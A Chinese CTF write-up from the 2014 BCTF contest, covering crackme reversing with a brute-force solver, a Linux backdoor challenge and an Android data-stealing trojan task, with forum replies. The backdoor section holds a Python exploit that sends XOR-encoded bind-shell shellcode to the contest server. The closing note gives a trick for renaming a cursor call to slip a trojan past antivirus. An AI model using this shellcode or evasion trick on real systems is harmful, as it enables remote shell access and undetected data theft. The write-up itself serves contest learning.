BCTF百度杯网络安全大赛部分
0×01 最难的题目: 100http://image.3001.net/images/20140311/13945184297390.jpg!small下载后,发现时exe文件,od加载,经调试发现有反调试http://image.3001.net/images/20140311/13945184322798.jpg!smallhttp://image.3001.net/images/20140311/13945184368646.jpg!small设置,直接上StrongOD,这下反调试就跳过了,然后发现运行中不停的弹框http://image.3001.net/images/20140311/13945184404555.jpg!smallNop掉这句messageBoxA,然后这个程序就可以顺利跑了。。跑好久后,可以看到http://image.3001.net/images/20140311/13945184423498.jpg!small即,把仅有的字符串拼接,得到这道题的Flag是TH3_H4rd3st_H3r30×02 小菜一碟: 200http://image.3001.net/images/20140311/13945186023936.jpg!smallOD加载,这道题明显就是要输个字符串然后验证正确,定位到输入后的验证地址http://image.3001.net/images/20140311/13945184468900.jpg!small这里可以看到要求输入是16位纯数字,而且输入后在内存中,会进行修正,即假设输入为a1-a16,则会在a5和a6中间插入 a5_5=01,a7和a8见插入a7_5=08,以及a10_5=00,a11_5=07http://image.3001.net/images/20140311/13945184497360.jpg!small下来就是提示所指出的这段代码含义:http://image.3001.net/images/20140311/13945184508058.jpg!small看似是乘了0×66666667实质这段代码是edx/10,后面这段代码反复会被用到,
http://image.3001.net/images/20140311/13945184531711.jpg!small这大段循环中,实际运行了两次,一共对密码进行了这些验证之前就验证了a1!=0 t1=(a6*a7)%10 t2=(a6*a7_5)%10 (a5_5*a7+(a6*a7)/10)%10==a1(a2-t1)==(a5_5*a7_5+(a6*a7_5)/10)%10a2>t1a3>t2(a5_5*a7+(a6*a7)/10)/10==00==(a5_5*a7_5+(x6*a7_5)/10)/10a2!=t1a3!=t2a3-t2<=a5_5a4<a6:一共这么多条规则,是不是震惊了。别急还没完,好不容易来到了这里http://image.3001.net/images/20140311/13945184562932.jpg!small你会发现这个call013d1000,进去后又是无尽的加加除除的,然后返回后,你需要通过这四个jnz才能继续向下,这个call和这四个jnz的具体对应是:t2=(a6*a9)%10t4=(a9+a6*a9/10)/10t5=a6*a8t3=a5_5*a9+(a6*a9)/10t7=a8+a6*a8/10t8=t5%10t9=t3%10t11=t7%10+(t8+t9)/10((t4+t11)/10+t7/10)==0(a3-(a6*a7_5)%10)==(t4+t11)%10a4==(t8+t9)%10:a5==t2震惊了吧。。。。别急,这里才刚刚验证了输入的a1-a9,还剩a10-a16呢,不过最后这几位简单了,直接内存中与已有的字符串进行了对比,即最后一段的循环。附下,这么多的变量靠脑子想有点难,所以写了个程序自己跑了:'''Created on 2014-3-9 print (a5_5*x7+(x6*x7)/10)%10==x1 print (x2-t1)==(a5_5*a7_5+(x6*a7_5)/10)%10 print x2>t1 print x3>t2 print (a5_5*x7+(x6*x7)/10)/10==0 print 0==(a5_5*a7_5+(x6*a7_5)/10)/10 printx3-t2<=a5_5@author: icefish'''#answer:6970825096996108a5_5=1a7_5=8def checkFirst(x1,x2,x3,x4,x6,x7): t1=(x6*x7)%10 t2=(x6*a7_5)%10 if x1!=0 and (a5_5*x7+(x6*x7)/10)%10==x1 and (x2-t1)==(a5_5*a7_5+(x6*a7_5)/10)%10 and x2>t1 and x3>t2 and (a5_5*x7+(x6*x7)/10)/10==0 and 0==(a5_5*a7_5+(x6*a7_5)/10)/10 and x2!=t1 and x3!=t2 and x3-t2<=a5_5 and x4<x6: if check(x3-t2,x4,x6): #print x1,x2,x3,x4,x6,x7 print 'a1='+str(x1),'a2='+str(x2),'a3='+str(x3),'a4='+str(x4),'a6='+str(x6),'a7='+str(x7) def check(a1_x,a4,a6): for a8 in range(10): for a9 in range(10): t2=(a6*a9)%10 t4=(a9+a6*a9/10)/10 t5=a6*a8 t3=a5_5*a9+(a6*a9)/10 t7=a8+a6*a8/10 t8=t5%10 t9=t3%10 t11=t7%10+(t8+t9)/10 if ((t4+t11)/10+t7/10)==0 and a1_x==(t4+t11)%10 and a4==(t8+t9)%10: print 'a8='+str(a8),'a9='+str(a9) print 'a5='+str(t2) return Trueif __name__ == '__main__': print 'start:' #checkFirst(6,9,7,1,2,5) for i in range(10): for j1 in range(10): for j2 in range(10): for j3 in range(10): for j4 in range(10): for j5 in range(10): checkFirst(i,j1,j2,j3,j4,j5)
得到a8=0, a9=9, a5=8, a1=6,a2=9, a3=7,a4=0, a6=2 , a7=5总的输入为:6970825096996108http://image.3001.net/images/20140311/13945184579566.jpg!small0×03 后门程序: 100 这个程序是个linux的,比较讨厌,题目本身不算复杂,edb调试和ida都可以很快的分析出来,这是个输入后溢出的题目http://image.3001.net/images/20140311/13945184591414.jpg!small然后很快定位到replay的输入检查http://image.3001.net/images/20140311/13945184611337.jpg!small这里实际把输入和固定字符串<baidu-rocks,froM-china-with-love>进行了异或,如果输入长度大于固定字符串,超过部分循环再开始和固定字符串异或http://image.3001.net/images/20140311/13945184634890.jpg!small异或结果前十个字节与后门字符串n0b4ckd00r比较
http://image.3001.net/images/20140311/13945184658027.jpg!small然后相等就进入了后门利用阶段,从输入异或后的第十个字节开始,call eax,进入了shellcodehttp://image.3001.net/images/20140311/1394518468912.jpg!small这里问题在于,直到最后我的shellcode也没能成功运行,不知何故。。http://image.3001.net/images/20140311/13945184688987.jpg!small附上代码:'''Created on 2014-3-9@author: icefish'''#! /usr/bin/env python#coding=utf-8import socketimport timefrom socket import *import os,sysimport re from time import sleep ip=""port="" def nc(str): s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) for i in range(200): data = s.recv(1000) print data if data.find('Replay')!=-1: break sleep(5) s.send(str) s.send('\n') sleep(5) print 'send:'+str #for i in range(10): #data = s.recv(1000) # print data def XORtools(str): strkey='<baidu-rocks,froM-china-with-love>' l=len(strkey) strEncry='' for i in range(len(str)): strEncry+=chr(ord(str[i])^ord(strkey[i%l])) return strEncryimport struct if __name__=='__main__': ip="218.2.197.249" port=1337 #fuzzle(0x250,0x262) str='\x52\x52\x03\x5d\x07\x1e\x49\x42\x5f\x11\x63\x77\xa7\xe8' strPass='n0b4ckd00r' strNop='\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' buf ="\x81\xEC\x00\x02\x00\x00" buf += "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01" buf += "\xcd\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1" buf += "\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x0b\xab\x6a" buf += "\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04" buf += "\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59" buf += "\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68" buf += "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b" buf += "\xcd\x80" Encry=XORtools(strPass+strNop+buf) for i in range(len(Encry)): print hex((ord(Encry[i]))) file=open('houmen100.txt','w') file.write(Encry) file.close() nc(Encry)0×04 窃密木马: 300这个基本上都是代码活,http://image.3001.net/images/20140311/1394519619737.jpg!small首先队伍有人通过google发现漏洞提示:http://blog.trustgo.com/k-9-mail-client-is-vulnerable-to-privacy-leak/#sthash.4ln86BHK.dpuf.com其次找到漏洞所在版本k9mail 4.005下载:http://k9mail.googlecode.com/files/k9-4.005-release.apkapktools,dex2jar解包得到AndroidMenifest.xml,发现了的确有这个问题http://image.3001.net/images/20140311/13945196252612.jpg!small下来就是纯粹的代码工作了,由于太长了,我把它放到了自己的Blog上了 http://icefishwp.sinaapp.com/,感兴趣的可以看看。不过这里好不容易本地写好,偷取成功,结果服务器上有av test,改掉了所有的字符串处理依然无法通过,由于时间太晚了,只能放弃了0×05感谢自己的队友,这次大家都很努力。ps 队伍:A4210B。最后一个木马题,AV中的特征码在 cur.moveToNext() 这个函数,换成cur.moveToLast(); 然后用 cur.moveToPrevious() 遍历就能过杀软了。。。
如文中未特别声明转载请注明出自:FreebuF.COM
我小学毕业,表示看不懂{:1_918:} 这个真牛,我佩服 算了,我看不懂,以后再说吧 我去,大神,大牛
页:
[1]